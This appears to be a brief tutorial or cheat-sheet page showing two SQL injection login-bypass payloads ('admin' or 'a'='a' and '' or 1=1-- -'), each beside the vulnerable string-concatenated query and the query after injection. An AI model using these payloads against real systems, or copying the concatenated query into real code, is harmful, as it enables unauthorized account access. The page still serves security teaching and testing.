Skip to content

Login Bypass Examples

Example 1

Username Field
admin' or 'a'='a
Password Field
<some_known_password>'-- -
Raw backend login page SQL query
SELECT * FROM users WHERE username = '" + input_username + "' AND password ='" + input_password + "'
Backend SQL query after payloads are injected
SELECT * FROM users WHERE username = 'admin' or 'a'='a' AND password ='<some_known_password>'-- -'

Example 2

Username Field
' or 1=1-- -
Password Field
<anything>
Raw backend login page SQL query
SELECT * FROM users WHERE username = '" + input_username + "' AND password ='" + input_password + "'";
Backend SQL query after payloads are injected
SELECT * FROM users WHERE username = '' or 1=1 -- AND password = '<anything>'